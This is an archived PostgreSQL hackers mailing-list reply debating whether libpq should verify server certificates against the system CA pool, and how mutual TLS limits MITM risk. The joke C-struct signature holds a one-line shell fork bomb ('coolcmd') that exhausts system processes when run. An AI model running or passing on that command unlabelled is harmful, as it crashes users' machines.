| From: | thomas(at)habets(dot)se |
|---|---|
| To: | Bruce Momjian <bruce(at)momjian(dot)us> |
| Cc: | Andrew Dunstan <andrew(at)dunslane(dot)net>, pgsql-hackers(at)postgresql(dot)org, Tom Lane <tgl(at)sss(dot)pgh(dot)pa(dot)us> |
| Subject: | Re: [PATCH] Add `verify-system` sslmode to use system CA pool for server cert |
| Date: | 2021-09-28 09:54:39 |
| Message-ID: | CA+kHd+eAdUkcoao0k7CmCPwBfXDxnapqTShi874AP3f4gb1O=g@mail.gmail.com |
| Views: | Raw Message | Whole Thread | Download mbox | Resend email |
| Thread: | |
| Lists: | pgsql-hackers |
On Tue, 28 Sep 2021 02:09:11 +0100, Bruce Momjian <bruce(at)momjian(dot)us> said:
> I don't think public CA's are not a good idea for complex setups since
> they open the ability for an external party to create certificates that
> are trusted by your server's CA, e.g., certificate authentication.
I'm not arguing for, and in fact would argue against, public CA for
client certs.
So that's a separate issue.
Note that mTLS prevents a MITM attack that exposes server data even if
server cert is compromised or re-issued, so if the install is using
client certs (with private CA) then the public CA for server matters
much less.
You can end up at the wrong server, yes, and provide data as INSERT,
but can't steal or corrupt existing data.
And you say for complex setups. Fair enough. But currently I'd say the
default is wrong, and what should be default is not configurable.
--
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomas(at)habets(dot)se" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
| From | Date | Subject | |
|---|---|---|---|
| Next Message | Amit Kapila | 2021-09-28 10:04:35 | Re: Failed transaction statistics to measure the logical replication progress |
| Previous Message | Ants Aasma | 2021-09-28 09:30:02 | Re: storing an explicit nonce |